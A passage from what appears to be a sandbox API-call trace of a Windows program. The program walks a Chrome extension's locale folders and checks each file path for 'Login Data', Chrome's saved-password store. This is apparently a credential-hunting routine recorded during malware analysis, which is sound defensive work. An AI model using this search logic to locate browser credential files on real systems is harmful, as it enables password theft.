Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.553] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.553] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.553] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.553] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.553] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.553] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned 138 [0161.553] lstrlenW (lpString="\\") returned 1 [0161.553] GetProcessHeap () returned 0x8e0000 [0161.553] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x118) returned 0x91b1d8 [0161.553] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0161.553] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\" [0161.553] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\") returned 139 [0161.553] lstrlenW (lpString="messages.json") returned 13 [0161.553] GetProcessHeap () returned 0x8e0000 [0161.553] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x132) returned 0x91b2f8 [0161.553] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\" [0161.553] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" [0161.553] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.553] GetProcessHeap () returned 0x8e0000 [0161.553] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.553] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json", lpSrch="Login Data") returned 0x0 [0161.553] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.553] GetProcessHeap () returned 0x8e0000 [0161.553] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.553] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.553] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.554] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.554] GetProcessHeap () returned 0x8e0000 [0161.554] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.554] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.554] GetProcessHeap () returned 0x8e0000 [0161.554] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.554] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="fr", cAlternateFileName="")) returned 1 [0161.554] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0161.554] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0161.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.554] lstrlenW (lpString="\\") returned 1 [0161.554] GetProcessHeap () returned 0x8e0000 [0161.554] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.554] lstrlenW (lpString="fr") returned 2 [0161.554] GetProcessHeap () returned 0x8e0000 [0161.554] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0161.554] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.554] GetProcessHeap () returned 0x8e0000 [0161.554] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned 137 [0161.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned 137 [0161.554] lstrlenW (lpString="\\*.*") returned 4 [0161.554] GetProcessHeap () returned 0x8e0000 [0161.554] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0161.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*" [0161.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.555] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.555] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.555] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.555] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.555] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned 137 [0161.555] lstrlenW (lpString="\\") returned 1 [0161.555] GetProcessHeap () returned 0x8e0000 [0161.555] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.555] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0161.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\" [0161.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\") returned 138 [0161.555] lstrlenW (lpString="messages.json") returned 13 [0161.555] GetProcessHeap () returned 0x8e0000 [0161.555] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.555] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\" [0161.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" [0161.555] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.555] GetProcessHeap () returned 0x8e0000 [0161.555] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.555] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.555] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.555] GetProcessHeap () returned 0x8e0000 [0161.555] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.555] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.555] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.556] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.556] GetProcessHeap () returned 0x8e0000 [0161.556] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.556] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.556] GetProcessHeap () returned 0x8e0000 [0161.556] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.556] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="he", cAlternateFileName="")) returned 1 [0161.556] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0161.556] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0161.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.556] lstrlenW (lpString="\\") returned 1 [0161.556] GetProcessHeap () returned 0x8e0000 [0161.556] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.556] lstrlenW (lpString="he") returned 2 [0161.556] GetProcessHeap () returned 0x8e0000 [0161.556] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.556] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="he" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he" [0161.556] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, 